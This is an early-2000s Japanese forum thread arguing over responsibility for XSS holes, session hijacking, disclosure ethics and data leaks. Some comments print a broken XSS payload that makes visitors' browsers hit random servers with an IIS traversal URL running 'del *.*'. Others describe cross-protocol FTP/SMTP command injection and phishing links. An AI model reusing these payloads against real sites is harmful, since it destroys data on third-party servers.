ところがどっこい。telnetを使ってftpなどに接続してみれば分かりますが、
$ telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 ProFTPD 1.2.1 Server (ProFTPD) [hoge]
GET / HTTP/1.0
500 GET not understood.
Host: fdsjkl
500 HOST: not understood.
Content-Length: 100
500 CONTENT-LENGTH: not understood.
USER hoge
331 Password required for hoge.
pass HOGE
530 Login incorrect.
ところで逆に、お粗末なシステムで大量の顧客情報を不正流出させてる企業を取り締まる法律、っつーのはないもんなのか?ページ上での陳謝だけでお茶を濁せる、っつーのは事件の重大性から考えて信じられないことだと思うんだが。現状だとたぶん個人ベースで実害を被った時に初めて個人ベースでその企業を訴えられる、というくらいなんだと思うが、流出した情報と実害 (変な Direct Mail/Email の増加は十分実害に値すると思うんだが) の相関を立証するのは極めて困難、とゆーあたりが弁護士を駆り立てて集団訴訟に持ってくには大きな障害っぽいしなぁ。
***
「金、金、金の世の中デスカ?」じゃないけど、「コスト、コスト」と叫ぶ人達を見てると、ネットバブルでちょっと HTML がかけるくらいの人達が雨後の筍のように Web 製作会社を作ってしまったことで過当競争気味なのかねぇ、と思う。当事者は可哀想と思うけど、安易にビジネスをはじめてしまったツケが回ってきてるだけなような気もするな…。
XSSで引き起こされる被害 (スコア:1, すばらしい洞察)
前者に付いては、要は「Cookieを盗まれても大丈夫」な仕組みにしておけば問題ない。
たとえば、セッションキーをCookieで保持するようにしているのであれば、そのセッションキーを生成する時にクライアントのIPアドレスを含むデータをMD5して作るとかすれば、他のIPアドレスからのセッションハイジャックは検出できる。
Proxy通してると同一IPになっちゃう可能性もあるけど、クライアントが自分でProxyを通すようにしているのであれば、それはクライアントの責任だし、一部CATV局みたいに、強制的にProxy通させているような場合はCATV局の責任。企業とかでFireWall通っている場合にはその企業の責任。
後者(ブラウザのバグ)は明らかにブラウザ供給者の責任です。
こうやって考えると、Webページ作成者の責任はごく限られているにも関わらず、「XSS問題は全部Web作成者が責任持って解決すべきだ」とばかりにフォームさえあれば<S>hoge</S>とか書いて回るヤツははっきり言ってウザい。
更にちょっとでも見つかろうものなら鬼の首でも取ったかのように騒ぎ立てて「○○のサイトは脆弱だ」とか言って回る頭悪そうなヤツもいるし。
脆弱なのはブラウザなんだよ!!
Re:XSSで引き起こされる被害 (スコア:2, 参考になる)
>「XSS問題は全部Web作成者が責任持って解決すべきだ」とばかりに
>フォームさえあれば<S>hoge</S>とか書いて回るヤツははっきり言ってウザい。
>更にちょっとでも見つかろうものなら鬼の首でも取ったかのように騒ぎ立てて
>「○○のサイトは脆弱だ」とか言って回る頭悪そうなヤツもいるし。
それ以外にも、ページの改変を出来ます。
昔、Officeさんが首相官邸のXSS脆弱性を利用した
首相コメント(偽)を見れるものを公開してました・・・
ニュース系サイトや、公的機関のWebPageとかで、ありもしない記事が、
さも*そのサーバー上に存在しているように見える*
と言うのは脅威にはならないのでしょうか?
しかも、外見も文体も変わらなかった場合、やられたことには気づき難いです。
>脆弱なのはブラウザなんだよ!!
ブラウザはこの場合ほぼ関係ありません。
Re:XSSで引き起こされる被害 (スコア:2, 参考になる)
ちなみに、その脅威は、2000年2月のCERT Advisory CA-2000-02 [cert.org] で既に書かれていました。(このCA-2000-02ですが、なぜかcookieの盗み出しのことが書かれてないんですよね…。)
Re:XSSで引き起こされる被害 (スコア:0)
銀行などではログイン手続きの時には既にSSLが成立しているのに?というのはそれはさておき。 こんなすぐバレて、追跡し易く、かつ、きっちりと犯罪が成
Re:XSSで引き起こされる被害 (スコア:1)
どうにもなかなか正しく理解されないようですね…。
Re:XSSで引き起こされる被害 (スコア:0)
いっている意味がよくわからないのですが、SSLのX.509認証はなんのためにあるのでしょうか?
Re:XSSで引き起こされる被害 (スコア:1)
Re:XSSで引き起こされる被害 (スコア:0)
Re:XSSで引き起こされる被害 (スコア:1)
Re:XSSで引き起こされる被害 (スコア:0)
Re:XSSで引き起こされる被害 (スコア:1)
Re:XSSで引き起こされる被害 (スコア:0)
Re:XSSで引き起こされる被害 (スコア:0)
Re:XSSで引き起こされる被害 (スコア:0)
不正アクセス禁止法には抵触しなさそう?
その暗証番号を使えば不正アクセス禁止法違反なのは当然。
結果的に迷惑を被れば原因を作ったものは全部偽計威力業務妨害なのかな。
Re:XSSで引き起こされる被害 (スコア:0)
Re:XSSで引き起こされる被害 (スコア:0)
たとえそれがより大きな犯罪を防ぐためであっても、犯罪をやっちゃえばやっぱり犯罪者。意図がどうあれ。
Re:XSSで引き起こされる被害 (スコア:0)
Re:XSSで引き起こされる被害 (スコア:1)
あと、CATVで同一IPアドレスになるのはProxyを強制しているからではなく、IP Masqueradeでプライベートアドレスを使わせているからだね。
あと、IPアドレスの完全一致でチェックするようにすると企業ユーザが使えなくなる(複数台のProxyサーバで負荷分散しているためにコネクションごとにIPアドレスが変わる)ことが多いのが現実だから、アドレスの最下位を無視するなどして幅を持たせてチェックせざるを得ない。となると、同じプロバイダにダイヤルアップしている者からの攻撃が防げなくなる。
素人はすっこんでたほうがいいよ。
Re:XSSで引き起こされる被害 (スコア:1)
> IP Masqueradeでプライベートアドレスを使わせているからだね。
もちろんそういう場合もありますが、トランスペアレントキャッシュで proxy を強制している場合もありますね。
Re:XSSで引き起こされる被害 (スコア:0, フレームのもと)
Re:XSSで引き起こされる被害 (スコア:1)
Re:XSSで引き起こされる被害 (スコア:1)
>* ブラウザのセキュリティホールを突いてクライアントにいらん事される
>(ファイルを読み出されたり消されたり実行ファイルを突っ込まれたり)
これはあくまでXSSで引き起こされる被害の一部です。
ブラウザで可能なことであればほとんど出来ると思います。
例えば、クロスサイトスクリプトの問題がある掲示板に以下のようなコー
ドを含んだ発言を書き込めば、この掲示板を開いたブラウザは勝手に任
意のサーバーに攻撃を仕掛けることが可能になります。
<script>
ip = Math.round(Math.random()*253+1)+"." + Math.round(Math.random()*255) + "." + Mathround(Math.eandom()*255) + ".Math.round(Math.random()*253+1);
window.open("http://"+ip+"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+*.*");
</script>
この手の例で有名なのはfushianaさんトラップがありますよね?まあ
ちょっと考えればこれを利用してワームを作ることも可能でしょう。
ちなみに、クリックすることで起動可能にするのであれば、FTPやSMTP
などについても攻撃可能にすることは可能だと思われます。TEXTエリア
に必要なコマンドを埋め込み、http://hoge.com:21/にPOSTで送信す
れば。。。
では、掲示板タイプでないものであれば安全か?と言うとそういうこと
もないと思います。インパクトがあるのは書き換えですよね。そのほか
にも踏み台として利用したりてことが考えられます。
ところで、ECサイト等のクロスサイトスクリプトには怪しいページか
らのリンクでなければ問題ないと言うのがありますが、なにも怪しいペ
ージからのリンクでなくてもメールを利用してしまえば簡単に悪意ある
コードを実行させることが可能だと思います。
例えば、「プレゼントセール実施中」等というメールにコードを含んだ
リンクを埋め込んでおけばたいていの人は引っかかるのではないでしょ
うか?
XSSを使えば自分の手を汚さないで結構悪いことが出来るので危険だと
思うのですが世間一般の認識はなんか低いですよねぇ?
Re:XSSで引き起こされる被害 (スコア:1)
サンプルコードはこうなります。
<script>
ip = Math.round(Math.random()*253+1)+"." + Math.round(Math.random()*255) + "." + Mathround(Math.eandom()*255) + ".Math.round(Math.random()*253+1); window.open("http://"+ip+"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+*.*");
</script>
Re:XSSで引き起こされる被害 (スコア:1)
<script>....</script>
が書き込めてしまったようですね。HTMLソースを参照。
どうしてだろう?<script>は削除されるようになっているはずなのに。
バグのようですが、再現方法がわからない。
今 #96960にアクセスすると、スクリプトエラーが出るよ。
エラーでよかった。本当にヤバいコードだから、動いていたら大変なところだった。
Re:XSSで引き起こされる被害 (スコア:1)
ページが途切れる問題が発生したのを緊急回避するためです。
Re:XSSで引き起こされる被害 (スコア:1)
#97122は、以下のように書いたのでした。(今回は全角文字にて回避)
========
「コードが消えてしまった」のではなく、そのまま
<script>...</script>
が書き込めてしまったようですね。HTMLソースを参照。
どうしてだろう?<script>は削除されるようになっているはずなのに。
バグのようですが、再現方法がわからない。
今 #96960にアクセスすると、スクリプトエラーが出るよ。
エラーでよかった。本当にヤバいコードだから、動いていたら大変なところだった。
========
しかも、二つ目の<script>に対応する</script>が無いために、ページがそこで途切れてしまう状態にもなってしまった。
上の「←ここには</script>を埋め込んでいます。」というのはその対策です。(意味がわからない方は、HTMLソースを見てください。)
バグ報告せねば…(汗
Re:XSSで引き起こされる被害 (スコア:1)
Re:XSSで引き起こされる被害 (スコア:1)
なぁんか出てないなぁと思い、ソースは見たんですが、実行されてなかったので(調べてみたら、JAVAscript実行できないようにしていたんで当然なんですが)気にもしなかったんです。
さて、このような問題があってもXSSは大した問題じゃないという人はいるんでしょうか?まあ、JAVAScriptを実行しないようにしていれば問題ないんですけどね。
ごめんなさい(オフトピ) (スコア:1)
別に、皆さんを陥れようと思ってやったわけじゃないんです。
出きれば、#96960のスクリプト削除してもらえないですか?湖面と丸ごとでもいいです。お願いします。
Re:XSSで引き起こされる被害 (スコア:1)
Re:XSSで引き起こされる被害 (スコア:1)
実体参照に変更しました.
#jbeef さんが書かれているとおり,コードレベルではすでに
#修正をしております.
ご迷惑をおかけして申し訳ありませんでした.
Re:XSSで引き起こされる被害 (スコア:1)
具体的には、POST / HTTP/1.1以下のHTTPヘッダが最初につきますし。
そのようなものを、たとえばftp鯖がすんなり受け入れるとは思えないのですが
Re:XSSで引き起こされる被害 (スコア:2, 参考になる)
$ telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 ProFTPD 1.2.1 Server (ProFTPD) [hoge]
GET / HTTP/1.0
500 GET not understood.
Host: fdsjkl
500 HOST: not understood.
Content-Length: 100
500 CONTENT-LENGTH: not understood.
USER hoge
331 Password required for hoge.
pass HOGE
530 Login incorrect.
とまぁ、間違ったコマンドは無視してしまうわけです。これをうまく使えば
必要なコマンドを発行できるわけですね。これを多分securityfocusのメーリングリストだったと思いますが見たときはちょっと驚いてしまいました。
Re:XSSで引き起こされる被害 (スコア:1)
と書きましたが、ここにこの件についての記述があります。 [securiteam.com]
『はっきり言ってウザい』 (スコア:0, フレームのもと)
<s>hoge</s>なんてのを通しちゃうチョロいスクリプトを置いちゃう「Webページ作成者」の責任ってのは本当に『ごく限られている』のか?
分かってないなら語るなよ。『はっきり言ってウザい』から。
あとAC投稿を否定するつもりは毛頭無いけどさ、『フォームさえあれば~』ってのは例えば別コメントに出てるOfficeさんの事を言ってるんだろうけど、半端知識で語
Re:『はっきり言ってウザい』 (スコア:1, 参考になる)
> 脆弱なのはブラウザじゃなくてスクリプトだろ?
両方だと思うのに 1 票。
お約束だけどこれ [neohapsis.com]って悪意のあるスクリプトに対してブラウザが脆弱な例ですよね?
スコア:-1,フレーム続けるな、ボケぇ! でよろしくぅ
Re:XSSで引き起こされる被害の本当のところは... (スコア:0)
> 更にちょっとでも見
Re:XSSで引き起こされる被害の本当のところは... (スコア:0, 興味深い)
かわいそうに、休日返上で働かされた人が居ました。 そっとしておけば、そのうち消えるマイナーな機能だったのに。報告されちゃうと、よくわかってない上司もそれを知り、身の保身のためにとにかく修正させようとするのね。
確かに 「Webで公開されるもには完璧じゃなきゃいけない」って主張も完全に否定はできませんが、セキュリティと危険の「コストバラン
Re:XSSで引き起こされる被害の本当のところは... (スコア:0)
雪印食品も、対象企業が特定できるように情報公開されたのは誰かが自己中心的だったから?雪印食品も、後ろで泣いている人もいるだろうけどね。
Re:XSSで引き起こされる被害 (スコア:0)
正確には『XSS 脆弱性を持つサイトで Cookie を盗まれうるのはブラウザが脆弱だからなんだよ!!』かね。
しかしブラウザが脆弱であったとしても XSS 脆弱性がなければこの問題が原因で Cookie が盗まれることはない。
脆弱なのはサイトなんだよ!!
冗談はとも
Re:XSSで引き起こされる被害 (スコア:1)
Re:XSSで引き起こされる被害 (スコア:0)
Re:Officeさんのこと? (スコア:1, 参考になる)
重箱の隅につついて、ほこりが出たら騒ぎ立てる。そうやってカネを得ようとするのが商売だからねぇ。仕方ないんじゃないすか。
本当にいい人ならこっそり会社に教えて、ちゃんと対応すればそのまま音便に済ませるでしょう。しかし、(自称)セキュリティ専門家は対応しようとしまいと騒ぐからね。こうやって自分を広告するしかないんです。
Re:Officeさんのこと? (スコア:1, 参考になる)
Office氏はそのように行動してるが何か?
その上でちゃんと対応しないので公開してるのだが何か?
#たしかに口は悪いけどね
Re:Officeさんのこと? (スコア:0)
Re:Officeさんのこと? (スコア:1)
「黙っていさえすればセキュリティーの問題は存在しないんだ、そうすれば管理者は対策しないでいられるから大助かりだ」という考え=つまり被害に遭うまでわからない人もいるし、警告してもらっても無視する人もいるようですね。
事実を明らかにしないと、消費者や顧客が被害に遭う羽目になりかねないのだけれど。でも「自分の銀行のサイトの脆弱性があっても俺は平気」という考えなら、立派です。
Re:Officeさんのこと? (スコア:0)
氏は脆弱性を見つけ次第脊髄反射で公開したりなどはしていないとおもったが。
氏が公開してるやり取りを見るに、管理者サイド側も「あいたたた」な感じがする。
性格的に若干問題があるような気がしないでもないが、有益なことをしているとおもわれる。
Re:Officeさんのこと? (スコア:0)
まっ、米国民にとって有益だからアフガニスタン中に爆弾バラ撒くのもOKだし、日本の亡命/難民を受け入れないという政策にとって有益だから亡命者を中国の警察に渡しちゃうのもOKだしね。
Re:Officeさんのこと? (スコア:1)
ところで逆に、お粗末なシステムで大量の顧客情報を不正流出させてる企業を取り締まる法律、っつーのはないもんなのか?ページ上での陳謝だけでお茶を濁せる、っつーのは事件の重大性から考えて信じられないことだと思うんだが。現状だとたぶん個人ベースで実害を被った時に初めて個人ベースでその企業を訴えられる、というくらいなんだと思うが、流出した情報と実害 (変な Direct Mail/Email の増加は十分実害に値すると思うんだが) の相関を立証するのは極めて困難、とゆーあたりが弁護士を駆り立てて集団訴訟に持ってくには大きな障害っぽいしなぁ。
***
「金、金、金の世の中デスカ?」じゃないけど、「コスト、コスト」と叫ぶ人達を見てると、ネットバブルでちょっと HTML がかけるくらいの人達が雨後の筍のように Web 製作会社を作ってしまったことで過当競争気味なのかねぇ、と思う。当事者は可哀想と思うけど、安易にビジネスをはじめてしまったツケが回ってきてるだけなような気もするな…。
Only Jav^Hpanese available :-)
Re:みんなカネないしね (スコア:1)
ネーダーや、まぁ office さんみたいなある種の「運動家」は、ある程度支持者を得て影響力を持ってこそナンボな部分があるわけで、そのための大前提の部分からして雲泥の差がある、ということが、このトピックで皆がこれだけ議論 (?) していることの原因なんでしょうね。技術的、法律的、倫理的、まぁなんでも「正しい」ことを主張していれば、表現形はどうあれ最終的には認められるはず、という妄想は非現実的であるってことだな。結局のところ技術的、法律的、倫理的、学問的まぁなんでも、意見が受け入れられるか否かということも、人と人との関係性の強度、という意味の政治力に左右されることは免れないのだとゆー普通人にとっては当たり前の結論に落ち着くわけだ。
ところで僕は office さん他についてそれほど詳しいわけじゃないんで、彼らの政治力が先の AC が書いたようにそれほど弱いのかどうかは定かではない (どっちかっつーと、皆がこれだけ知っている、というだけでも逆に相当なもんだと僕は思う)。そこんとこ、誤解しないで欲しい>皆の衆。
#カネなくて余裕ない、とゆーのには全く同意。今のニッポンの状況を如実に表していますな。
Only Jav^Hpanese available :-)